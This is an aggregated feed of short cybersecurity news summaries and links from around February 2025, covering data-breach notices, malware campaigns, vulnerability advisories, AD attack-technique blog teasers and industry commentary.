Orange Romania - 556,557 breached accounts
In February 2025, the Romanian arm of telecommunications company Orange suffered a data breach which was subsequently published to a popular hacking forum. The data included 556k email addresses (of which hundreds of thousands were in the form of [phone number]@as1.romtelecom.net), phone numbers, subscription details, partial credit card data (type, last 4 digits, expiration date and issuing bank). The breach also exposed an extensive number of internal documents.
https://haveibeenpwned.com/PwnedWebsites#OrangeRomania
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

U.S. Soldier Charged in AT&T Hack Searched “Can Hacking Be Treason”
A U.S. Army soldier who pleaded guilty last week to leaking phone records for high-ranking U.S. government officials searched online for non-extradition countries and for an answer to the question "can hacking be treason?" prosecutors in the case said Wednesday. The government disclosed the details in a court motion to keep the defendant in custody until he is discharged from the military.
https://krebsonsecurity.com/2025/02/u-s-soldier-charged-in-att-hack-searched-can-hacking-be-treason/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fake IP checker utilities on npm are crypto stealers
Recently identified npm packages called "node-request-ip", "request-ip-check" and "request-ip-validator" impersonate handy open source utilities relied upon by developers to retrieve an external IP address but instead target Windows, Linux and macOS users with malicious executables which are trojans and cryptocurrency stealers.
https://www.sonatype.com/blog/fake-ip-checker-utilities-on-npm-are-crypto-stealers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Rethinking remote assistance security in a Zero Trust world
The rise in sophisticated cyberthreats demands a fundamental shift in our approach. Organizations must rethink remote assistance security through the lens of Zero Trust, using the three key principles of Verify Explicitly, Use Least Privilege, and Assume Breach as a guide and ensuring that every session, user, and device is verified, compliant, and monitored before access is granted.   The post Rethinking remote assistance security in a Zero Trust world appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/02/26/rethinking-remote-assistance-security-in-a-zero-trust-world/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Why AI Can't Replace Cybersecurity Analysts
As we face an extreme downturn in cybersecurity hiring which entry level candidates bear the brunt of, I want to address an elephant in the room: AI. I spend a lot of my time providing career clinics and mentorship, and I truly understand this is one of the worst cybersecurity job markets for young people […]
https://tisiphone.net/2025/02/26/why-ai-cant-replace-cybersecurity-analysts/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Phillip Wylie Show!
I made an appearance on the wonderful Phillip Wylie show! It was incredibly kind of him to have me on. We talked about a kind of niche area of ICS – how to do digital forensics in that space – especially weird and legacy stuff – and what that actually means during incident response. Check […]
https://tisiphone.net/2025/02/26/the-phillip-wylie-show/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Building a security-minded development team: DevSecOps tools and SDLC best practices
In an increasingly adversarial threat landscape, software security can't be just one more checkpoint on the road to your next release. It should be integral to how every member of your development team works, from developers and DevOps professionals to quality assurance testers and project managers. As your organization faces increasingly sophisticated threats, a security-minded development team has evolved from a "nice-to-have" into a business imperative.
https://www.sonatype.com/blog/building-a-security-minded-development-team-devsecops-tools-and-sdlc-best-practices
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Celebrating 1 Year of CSF 2.0
It has been one year since the release of the NIST Cybersecurity Framework (CSF) 2.0 ! To make improving your security posture even easier, in this blog we are: Sharing new CSF 2.0 resources; Taking a retrospective look at some resources and applications you may have missed; and Highlighting ways you can stay involved in our work, helping us help you implement better cybersecurity. NIST's subject matter experts have worked over the last year to continue expanding the CSF 2.0 implementation resources to help you secure your enterprise. Stakeholders are a very important force behind NIST's
https://www.nist.gov/blogs/cybersecurity-insights/celebrating-1-year-csf-20
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

RustDoor and Koi Stealer for macOS Used by North Korea-Linked Threat Actor to Target the Cryptocurrency Sector
Koi Stealer and RustDoor malware were used in a campaign linked to North Korea. This activity targeted crypto wallet owners. The post RustDoor and Koi Stealer for macOS Used by North Korea-Linked Threat Actor to Target the Cryptocurrency Sector appeared first on Unit 42.
https://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Exploits and vulnerabilities in Q4 2024
This report provides statistics on vulnerabilities and exploits and discusses the most frequently exploited vulnerabilities in Q4 2024.
https://securelist.com/vulnerabilities-and-exploits-in-q4-2024/115761/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Google Announces Quantum-Safe Digital Signatures For Cloud KMS
Google has announced that it is integrating quantum resistance into its cloud security structure. As… Google Announces Quantum-Safe Digital Signatures For Cloud KMS on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/02/26/google-announces-quantum-safe-digital-signatures-for-cloud-kms/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Securing tomorrow's software: the need for memory safety standards
Posted by Alex Rebert, Security Foundations, Ben Laurie, Research, Murali Vijayaraghavan, Research and Alex Richardson, SiliconFor decades, memory safety vulnerabilities have been at the center of various security incidents across the industry, eroding trust in technology and costing billions. Traditional approaches, like code auditing, fuzzing, and exploit mitigations – while helpful – haven't been enough to stem the tide, while incurring an increasingly high cost.In this blog post, we are calling for a fundamental shift: a collective commitment to finally eliminate this class of vulnerabilities, anchored on secure-by-design practices – not just for ourselves but for the generations that follow.The shift we are calling for is reinforced by a recent ACM article calling to standardize...
http://security.googleblog.com/2025/02/securing-tomorrows-software-need-for.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ALIEN TXTBASE Stealer Logs - 284,132,969 breached accounts
In February 2025, 23 billion rows of stealer logs were obtained from a Telegram channel known as ALIEN TXTBASE. The data contained 284M unique email addresses alongside the websites they were entered into and the passwords used. This data is now searchable in HIBP by both email domain and the domain of the target website.
https://haveibeenpwned.com/PwnedWebsites#AlienStealerLogs
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Behind the Baseline: Reflecting on the launch of the Open Source Project Security Baseline
It's been a while since I've shared an update on the work Sonatype is doing in the open source ecosystem, so I'm excited to share an update on a few things we're doing in the space — and how it led to the creation of a new security standard in the Open Source Security Foundation (OpenSSF).
https://www.sonatype.com/blog/behind-the-baseline-reflecting-on-the-launch-of-the-open-source-project-security-baseline
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Passkeys
Don't we all know the hassle of managing loads of passwords, trying to come up with secure and unique ones only to try afterwards to remember them? Or always staying on high alert whether the URL is definitely the valid one for the website we are trying to visit? What if all this could be over soon? Welcome to Passkeys!
https://blog.compass-security.com/2025/02/passkeys/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Auto-Color: An Emerging and Evasive Linux Backdoor
The new Linux malware named Auto-color uses advanced evasion tactics. Discovered by Unit 42, this article cover its installation, evasion features and more. The post Auto-Color: An Emerging and Evasive Linux Backdoor appeared first on Unit 42.
https://unit42.paloaltonetworks.com/new-linux-backdoor-auto-color/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

PirateFi Game Infected Steam Users' Devices With Malware
Steam users must scan their systems for possible malware infection as the service warns users… PirateFi Game Infected Steam Users' Devices With Malware on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/02/24/piratefi-game-infected-steam-users-devices-with-malware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The GitVenom campaign: cryptocurrency theft using GitHub
Kaspersky researchers discovered GitVenom campaign distributing stealers and open-source backdoors via fake GitHub projects.
https://securelist.com/gitvenom-campaign/115694/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Trump 2.0 Brings Cuts to Cyber, Consumer Protections
One month into his second term, President Trump's actions to shrink the government through mass layoffs, firings and withholding funds allocated by Congress have thrown federal cybersecurity and consumer protection programs into disarray. At the same time, agencies are battling an ongoing effort by the world's richest man to wrest control over their networks and data.
https://krebsonsecurity.com/2025/02/trump-2-0-brings-cuts-to-cyber-consumer-protections/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Rust rising: Navigating the ecosystem and adoption challenges
Rust continues to gain traction as a powerful programming language, balancing high performance with memory safety.
https://www.sonatype.com/blog/rust-rising-navigating-the-ecosystem-and-adoption-challenges
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Investigating LLM Jailbreaking of Popular Generative AI Web Products
We discuss vulnerabilities in popular GenAI web products to LLM jailbreaks. Single-turn strategies remain effective, but multi-turn approaches show greater success. The post Investigating LLM Jailbreaking of Popular Generative AI Web Products appeared first on Unit 42.
https://unit42.paloaltonetworks.com/jailbreaking-generative-ai-web-products/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Spyic - 875,999 breached accounts
In February 2025, the spyware service Spyic suffered a data breach along with sibling spyware service, Cocospy. The Spyic breach alone exposed almost 876k customer email addresses which were provided to HIBP, and reportedly also enabled unauthorised access to captured messages, photos, call logs, and more. The data was provided to HIBP by a source who requested it be attributed to "zathienaephi@proton.me".
https://haveibeenpwned.com/PwnedWebsites#Spyic
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cocospy - 1,798,059 breached accounts
In February 2025, the spyware service Cocospy suffered a data breach along with sibling spyware service, Spyic. The Cocospy breach alone exposed almost 1.8M customer email addresses which were provided to HIBP, and reportedly also enabled unauthorised access to captured messages, photos, call logs, and more. The data was provided to HIBP by a source who requested it be attributed to "zathienaephi@proton.me".
https://haveibeenpwned.com/PwnedWebsites#Cocospy
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft at Legalweek: Help safeguard your AI future with Microsoft Purview​
​Connect with Microsoft at Legalweek 2025 to learn how to embrace AI while protecting your organization's data with Microsoft Purview. ​ The post Microsoft at Legalweek: Help safeguard your AI future with Microsoft Purview​ appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/02/20/microsoft-at-legalweek-help-safeguard-your-ai-future-with-microsoft-purview/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI impact on the future of automation and ethics: Insights from Gartner® report
Artificial intelligence (AI) is no longer just a tool for efficiency — it is shaping the very fabric of business operations, decision-making, and human interaction. As AI permeates every aspect of technology, the impact of AI extends beyond innovation to include automation, human augmentation, and new ethical challenges.
https://www.sonatype.com/blog/ai-impact-on-the-future-of-automation-and-ethics-insights-from-gartner-report
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fake job offers target software developers with infostealers
A North Korea-aligned activity cluster tracked by ESET as DeceptiveDevelopment drains victims' crypto wallets and steals their login details from web browsers and password managers
https://www.welivesecurity.com/en/videos/fake-job-offers-target-coders-infostealers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Stately Taurus Activity in Southeast Asia Links to Bookworm Malware
Unit 42 details the just-discovered connection between threat group Stately Taurus (aka Mustang Panda) and the malware Bookworm, found during analysis of the group's infrastructure. The post Stately Taurus Activity in Southeast Asia Links to Bookworm Malware appeared first on Unit 42.
https://unit42.paloaltonetworks.com/stately-taurus-uses-bookworm-malware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DeceptiveDevelopment targets freelance developers
ESET researchers analyzed a campaign delivering malware bundled with job interview challenges
https://www.welivesecurity.com/en/eset-research/deceptivedevelopment-targets-freelance-developers/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Last chance for online career mentorship, for a while
As I turn my attention to the major life change of moving to Australia, this will be the last opportunity to take advantage of my free, weekly cybersecurity career mentorship sessions for the indefinite future. I’ve really enjoyed providing this service on top of my normal career clinics at conferences, and I hope I can […]
https://tisiphone.net/2025/02/19/last-chance-for-online-career-mentorship-for-a-while/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Podcast: Expanding Frontiers Research
In this podcast, I’m asked about current and future trends in industrial cyberattacks, as well as a variety of community and social issues facing our industry in the future.
https://tisiphone.net/2025/02/19/podcast-expanding-frontiers-research/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft is named a Leader in the 2025 Gartner® Magic Quadrant™ for cyber-physical systems protection platforms​​
We are excited to announce that Gartner has named  Microsoft a Leader in the 2024 Gartner® Magic Quadrant™ for Cyber Physical Systems Protection Platforms. Gartner defines Cyber-physical systems (CPS) as "engineered systems that orchestrate sensing, computation, control, networking and analytics" that connect the digital and physical worlds. They span industrial control systems (ICS), OT devices, Internet of Things (IoT) devices, and more.    The post Microsoft is named a Leader in the 2025 Gartner® Magic Quadrant™ for cyber-physical systems protection platforms​​ appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2025/02/19/microsoft-is-named-a-leader-in-the-2025-gartner-magic-quadrant-for-cyber-physical-systems-protection-platforms/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Securing multi-environment deployments: Cloud, on-premise, and air-gapped
Modern software delivery makes use of many different deployment environments, from public cloud to private cloud and traditional on-premise data centers to highly secured air-gapped systems. Organizations take advantage of multiple deployment models to meet cost optimization, regulatory compliance, and operational flexibility objectives.
https://www.sonatype.com/blog/securing-multi-environment-deployments-cloud-on-premise-and-air-gapped
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

INE Security's Cybersecurity and IT Training Enhances Career Stability in Tech
Cary, North Carolina, 19th February 2025, CyberNewsWire INE Security’s Cybersecurity and IT Training Enhances Career Stability in Tech on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2025/02/19/ine-securitys-cybersecurity-and-it-training-enhances-career-stability-in-tech/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Proofpoint ranked #1 in Four out of Five Use Cases in the 2025 Gartner® Critical Capabilities™ Report for Email Security Platforms

https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-ranked-1-four-out-five-use-cases-2025-gartnerr-critical
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How Phished Data Turns into Apple & Google Wallets
Carding -- the underground business of stealing, selling and swiping stolen payment card data -- has long been the dominion of Russia-based hackers. Happily, the broad deployment of more secure chip-based payment cards in the United States has weakened the carding market. But a flurry of innovation from cybercrime groups in China is breathing new life into the carding industry, by turning phished card data into mobile wallets that can be used online and at main street stores.
https://krebsonsecurity.com/2025/02/how-phished-data-turns-into-apple-google-wallets/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

2024 Vulnerability Scanning Surges 91%
Scans intensify, looking for a critical vulnerability in TBK DVR devices.
https://www.f5.com/labs/articles/threat-intelligence/2024-vulnerability-scanning-surges-91
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

No, you're not fired – but beware of job termination scams
Some employment scams take an unexpected turn as cybercriminals shift from “hiring” to “firing” staff
https://www.welivesecurity.com/en/scams/no-youre-not-fired-beware-job-termination-scams/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Katharine Hayhoe: The most important climate equation | Starmus highlights
The atmospheric scientist makes a compelling case for a head-to-heart-to-hands connection as a catalyst for climate action
https://www.welivesecurity.com/en/we-live-science/katharine-hayhoe-most-important-climate-equation-starmus-highlights/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

On Cybersecurity Mentorship
I want to take a moment to articulate my thoughts on cybersecurity mentorship and what it should entail. I speak a lot about problems I see doing extensive mentoring and career clinics, but I have been repeatedly asked for a formal resource on how to conduct mentorships (and find a mentor). First, your mileage may […]
https://tisiphone.net/2025/02/16/on-cybersecurity-mentorship/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A Very Personal Interview with SecurityWeek Magazine
I hope you enjoy my latest interview with SecurityWeek Magazine on my career and the future of OT cybersecurity. https://www.securityweek.com/rising-tides-lesley-carhart-on-bridging-enterprise-security-and-ot-and-improving-the-human-condition/
https://tisiphone.net/2025/02/16/a-very-personal-interview-with-securityweek-magazine/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Storenvy - 11,052,071 breached accounts
In mid-2019, the e-commerce website Storenvy suffered a data breach that exposed millions of customer records. A portion of the breached records were subsequently posted to a hacking forum with cracked password hashes, whilst the entire corpus of 23M rows was put up for sale. The data contained 11M unique email addresses alongside usernames, IP addresses, the user's city, gender date of birth and original salted SHA-1 password hash.
https://haveibeenpwned.com/PwnedWebsites#Storenvy
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

4 ways to bring cybersecurity into your community
It’s easy to focus on technology when talking about cybersecurity. However, the best prevention measures rely on the education of those who use technology. Organizations training their employees is the first step. But the industry needs to expand the concept of a culture of cybersecurity and take it from where it currently stands as an […] The post 4 ways to bring cybersecurity into your community appeared first on Security Intelligence.
https://securityintelligence.com/articles/4-ways-to-bring-cybersecurity-into-your-community/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft .NET Framework Information Disclosure Vulnerability
What is the Attack?Threat Actors are targeting a Microsoft .NET Framework information disclosure vulnerability (CVE-2024-29059) that exposes the ObjRef URI to an attacker, ultimately enabling remote code execution. The security vulnerability tracked as CVE-2024-29059, has also been added to CISA's Known Exploited Vulnerabilities (KEV) Catalog on February 4, 2025.What is the recommended Mitigation?FortiGuard recommends users to apply the fix provided by the vendor and follow instructions as mentioned on the vendor's advisory. [CVE-2024-29059 - Security Update Guide - Microsoft - .NET Framework Information Disclosure Vulnerability]What FortiGuard Coverage is available?FortiGuard IPS protection is available, and Fortinet customers remain protected through it. Intrusion Prevention | FortiGuard...
https://fortiguard.fortinet.com/threat-signal-report/6014
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Nearly a Year Later, Mozilla is Still Promoting OneRep
In mid-March 2024, KrebsOnSecurity revealed that the founder of the personal data removal service Onerep also founded dozens of people-search companies. Shortly after that investigation was published, Mozilla said it would stop bundling Onerep with the Firefox browser and wind down its partnership. But nearly a year later, Mozilla is still promoting it to Firefox users.
https://krebsonsecurity.com/2025/02/nearly-a-year-later-mozilla-is-still-promoting-onerep/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Out with the Old, In with the Bold: Gen Threat Labs
For years, Avast Decoded has been your go-to for the latest in cybersecurity insights and research. But as cybercriminals evolve, so do we. Starting now, our groundbreaking research, expert analysis and the stories that keep the digital world safe are moving to one place: the Gen Insights Blog. By uniting our expertise under the Gen […] The post Out with the Old, In with the Bold: Gen Threat Labs appeared first on Avast Threat Labs.
https://decoded.avast.io/salat/out-with-the-old-in-with-the-bold-gen-threat-labs/?utm_source=rss&utm_medium=rss&utm_campaign=out-with-the-old-in-with-the-bold-gen-threat-labs
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How red teaming helps safeguard the infrastructure behind AI models
Artificial intelligence (AI) is now squarely on the frontlines of information security. However, as is often the case when the pace of technological innovation is very rapid, security often ends up being a secondary consideration. This is increasingly evident from the ad-hoc nature of many implementations, where organizations lack a clear strategy for responsible AI […] The post How red teaming helps safeguard the infrastructure behind AI models appeared first on Security Intelligence.
https://securityintelligence.com/articles/how-red-teaming-helps-safeguard-the-infrastructure-behind-ai-models/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Gaming or gambling? Lifting the lid on in-game loot boxes
The virtual treasure chests and other casino-like rewards inside your children's games may pose risks you shouldn't play down
https://www.welivesecurity.com/en/kids-online/gaming-gambling-lifting-lid-in-game-loot-boxes/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Doxbin (TOoDA) - 136,461 breached accounts
In February 2025, the "doxing" website Doxbin was compromised by a group calling themselves "TOoDA" and the data dumped publicly. Included in the breach were 336k unique email addresses alongside usernames. The data was provided to HIBP by a source who requested it be attributed to "emo.rip".
https://haveibeenpwned.com/PwnedWebsites#DoxbinTOoDA
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Zacks (2024) - 11,994,223 breached accounts
In June 2024, the investment research company Zacks was allegedly breached, and data was later published to a popular hacking forum. This comes after a separate Zacks data breach confirmed by the organisation in 2023 with the subsequent breach disclosing millions of additional records representing a superset of data from the first incident. The 2024 breach included 12M unique email addresses along with IP and physical addresses, names, usernames, phone numbers and unsalted SHA-256 password hashes. Zacks did not respond to multiple attempts to contact them about the incident.
https://haveibeenpwned.com/PwnedWebsites#Zacks2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Shadow Credentials Attack
In this post, we explore the exploitation technique known as the Shadow Credentials attack. This attack leverages the mismanagement or exploitation of Active Directory Certificate The post Shadow Credentials Attack appeared first on Hacking Articles.
https://www.hackingarticles.in/shadow-credentials-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How GitHub uses CodeQL to secure GitHub
How GitHub's Product Security Engineering team manages our CodeQL implementation at scale and how you can, too. The post How GitHub uses CodeQL to secure GitHub appeared first on The GitHub Blog.
https://github.blog/engineering/how-github-uses-codeql-to-secure-github/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

When you shouldn't patch: Managing your risk factors
Look at any article with advice about best practices for cybersecurity, and about third or fourth on that list, you’ll find something about applying patches and updates quickly and regularly. Patching for known vulnerabilities is about as standard as it gets for good cybersecurity hygiene, right up there with using multi-factor authentication and thinking before […] The post When you shouldn't patch: Managing your risk factors appeared first on Security Intelligence.
https://securityintelligence.com/articles/when-you-shouldnt-patch-managing-your-risk-factors/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What is penetration testing? | Unlocked 403 cybersecurity podcast (ep. 10)
Ever wondered what it's like to hack for a living – legally? Learn about the art and thrill of ethical hacking and how white-hat hackers help organizations tighten up their security.
https://www.welivesecurity.com/en/videos/what-is-penetration-testing-unlocked-403-cybersecurity-podcast-ep-10/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The straight and narrow — How to keep ML and AI training on track
Artificial intelligence (AI) and machine learning (ML) have entered the enterprise environment. According to the IBM AI in Action 2024 Report, two broad groups are onboarding AI: Leaders and learners. Leaders are seeing quantifiable results, with two-thirds reporting 25% (or greater) boosts to revenue growth. Learners, meanwhile, say they’re following an AI roadmap (72%), but […] The post The straight and narrow — How to keep ML and AI training on track appeared first on Security Intelligence.
https://securityintelligence.com/articles/the-straight-and-narrow-how-to-keep-ml-and-ai-training-on-track/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How AI-driven identify fraud is causing havoc
Deepfake fraud, synthetic identities, and AI-powered scams make identity theft harder to detect and prevent – here's how to fight back
https://www.welivesecurity.com/en/cybersecurity/ai-driven-identify-fraud-havoc/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Stealthy AD CS Reconnaissance
Introducing a certipy parse command to perform stealthy offline AD CS enumeration based on local registry data.
https://blog.compass-security.com/2025/02/stealthy-ad-cs-reconnaissance/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Permission escalation due to an Improper Privilege Management
An incorrect privilege assignment vulnerability [CWE-266] in the FortiOS security fabric may allow an authenticated admin whose access profile has the Security Fabric write permission to escalate their privileges to super-admin by connecting the targetted FortiGate to a malicious upstream FortiGate they control. Revised on 2025-03-13 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-302
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

LandAirSea - 337,373 breached accounts
In January 2025, the GPS tracking service LandAirSea suffered a data breach that exposed 337k unique customer email addresses alongside names, usernames and password hashes. The breach also exposed partial credit card data (card type, last 4 digits and expiration), and GPS device identifiers and locations. LandAirSea is aware of the breach and has remediated the underlying vulnerability. The data was provided to HIBP by a source who requested it be attributed to "zathienaephi@proton.me".
https://haveibeenpwned.com/PwnedWebsites#LandAirSea
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Reducing ransomware recovery costs in education
2024 continued the trend of ransomware attacks in the education sector making headlines. The year opened with Freehold Township School District in New Jersey canceling classes due to a ransomware attack. Students at New Mexico Highlands University missed classes for several days while employees experienced disruption of their paychecks after a ransomware attack. The attack on […] The post Reducing ransomware recovery costs in education appeared first on Security Intelligence.
https://securityintelligence.com/articles/reducing-ransomware-recovery-costs-in-education/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Neil Lawrence: What makes us unique in the age of AI | Starmus highlights
As AI advances at a rapid clip, reshaping industries, automating tasks, and redefining what machines can achieve, one question looms large: what remains uniquely human?
https://www.welivesecurity.com/en/we-live-science/neil-lawrence-what-makes-us-unique-age-ai-starmus-highlights/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Adopt Me Trading Values - 86,136 breached accounts
In July 2022, the Adopt Me Trading Values website for assessing the value of pet trades within the "Adopt Me!" Roblox game suffered a data breach that was later redistributed as part of a larger corpus of data. The breach exposed 86k unique email addresses along with usernames (and Roblox usernames), IP addresses and bcrypt password hashes. The data was provided to HIBP by a source who requested it be attributed to "Leidhall".
https://haveibeenpwned.com/PwnedWebsites#AdoptMeTradingValues
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Abusing AD Weak Permission Pre2K Compatibility
Pre2K (short for “Pre-Windows 2000”) Active Directory misconfigurations often stem from overlooked legacy settings in Windows environments. Common issues include enabling NTLM or SMBv1 for The post Abusing AD Weak Permission Pre2K Compatibility appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-weak-permission-pre2k-compatibility/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Trimble Cityworks Remote Code Execution Attack
What is the Attack?Trimble Cityworks contains a deserialization vulnerability. This could allow an authenticated user to perform a remote code execution attack against a customer's Microsoft Internet Information Services (IIS) web server, potentially resulting in downtime and potential loss of service. According to Trimble Cityworks website, it provides a Geographic Information System (GIS)-centric solution for local governments, utilities, airports, and public works agencies to manage and maintain infrastructure across the full lifecycle. Trimble has investigated customer reports of hackers exploiting the vulnerability to gain unauthorized access to networks, confirming that active exploitation is occurring. CISA has added CVE-2025-0994 to its Known Exploited Vulnerabilities Catalog on February...
https://fortiguard.fortinet.com/threat-signal-report/5997
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Brain Cipher Ransomware Attack
What is the attack?A significant ransomware attack has struck Pusat Data Nasional (PDN), one of Indonesia's government-owned national data centers. This incident involved threat actors encrypting government data, which disrupted digital services for immigration, airport checks, and several public services. This ransomware attack represents a new variant of the LockBit 3.0 ransomware. In 2023, the LockBit hacker group also severely disrupted the Bank Syariah Indonesia (BSI) systems.What is the recommended Mitigation?Ensure that all systems are up to date with robust cybersecurity measures. Also, maintain general awareness and training about the risk of phishing and social engineering attacks in the organization. What FortiGuard Coverage is available?FortiGuard Labs has AV signatures to block...
https://fortiguard.fortinet.com/threat-signal-report/5479
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

From finding to fixing: GitHub Advanced Security integrates Endor Labs SCA
The partnership between GitHub and Endor Labs enables application security engineers and developers to drastically reduce time spent on open source vulnerabilities, and gives them the tools to go from finding to fixing. The post From finding to fixing: GitHub Advanced Security integrates Endor Labs SCA appeared first on The GitHub Blog.
https://github.blog/security/from-finding-to-fixing-github-advanced-security-integrates-endor-labs-sca/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Will AI threaten the role of human creativity in cyber threat detection?
Cybersecurity requires creativity and thinking outside the box. It’s why more organizations are looking at people with soft skills and coming from outside the tech industry to address the cyber skills gap. As the threat landscape becomes more complex and nation-state actors launch innovative cyberattacks against critical infrastructure, there is a need for cybersecurity professionals […] The post Will AI threaten the role of human creativity in cyber threat detection? appeared first on Security Intelligence.
https://securityintelligence.com/articles/will-ai-threaten-the-role-of-human-creativity-in-cyber-threat-detection/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hacking the mind: Why psychology matters to cybersecurity
In cybersecurity, too often, the emphasis is placed on advanced technology meant to shield digital infrastructure from external threats. Yet, an equally crucial — and underestimated — factor lies at the heart of all digital interactions: the human mind. Behind every breach is a calculated manipulation, and behind every defense, a strategic response. The psychology […] The post Hacking the mind: Why psychology matters to cybersecurity appeared first on Security Intelligence.
https://securityintelligence.com/articles/hacking-the-mind-why-psychology-matters-to-cybersecurity/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

1-15 November 2024 Cyber Attacks Timeline
In the first timeline of November 2024 I collected 128 events with a threat landscape dominated by malware...
https://www.hackmageddon.com/2025/02/06/1-15-november-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Stress-testing multimodal AI applications is a new frontier for red teams
Human communication is multimodal. We receive information in many different ways, allowing our brains to see the world from various angles and turn these different “modes” of information into a consolidated picture of reality. We’ve now reached the point where artificial intelligence (AI) can do the same, at least to a degree. Much like our […] The post Stress-testing multimodal AI applications is a new frontier for red teams appeared first on Security Intelligence.
https://securityintelligence.com/articles/stress-testing-multimodal-ai-applications-new-frontier-for-red-teams/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybercriminals Use Go Resty and Node Fetch in 13 Million Password Spraying Attempts

https://www.proofpoint.com/us/newsroom/news/cybercriminals-use-go-resty-and-node-fetch-13-million-password-spraying-attempts
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybersecurity awareness: Apple's cloud-based AI security system
The rising influence of artificial intelligence (AI) has many organizations scrambling to address the new cybersecurity and data privacy concerns created by the technology, especially as AI is used in cloud systems. Apple addresses AI’s security and privacy issues head-on with its Private Cloud Compute (PCC) system. Apple seems to have solved the problem of […] The post Cybersecurity awareness: Apple’s cloud-based AI security system appeared first on Security Intelligence.
https://securityintelligence.com/articles/cybersecurity-awareness-apples-cloud-based-ai-security-system/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Lazarus Group Targets Organizations with Sophisticated LinkedIn Recruiting Scam
Bitdefender Labs warns of an active campaign by the North Korea-linked Lazarus Group, targeting organizations by capturing credentials and delivering malware through fake LinkedIn job offers. LinkedIn may be a vital tool for job seekers and professionals, but it has also become a playground for cybercriminals exploiting its credibility. From fake job offers and elaborate phishing schemes to scams and even state-sponsored threat actors who prey on people's career aspirations and trust in profess
https://www.bitdefender.com/en-us/blog/labs/lazarus-group-targets-organizations-with-sophisticated-linkedin-recruiting-scam
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Patch or perish: How organizations can master vulnerability management
Don't wait for a costly breach to provide a painful reminder of the importance of timely software patching
https://www.welivesecurity.com/en/cybersecurity/patch-perish-organizations-vulnerability-management/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

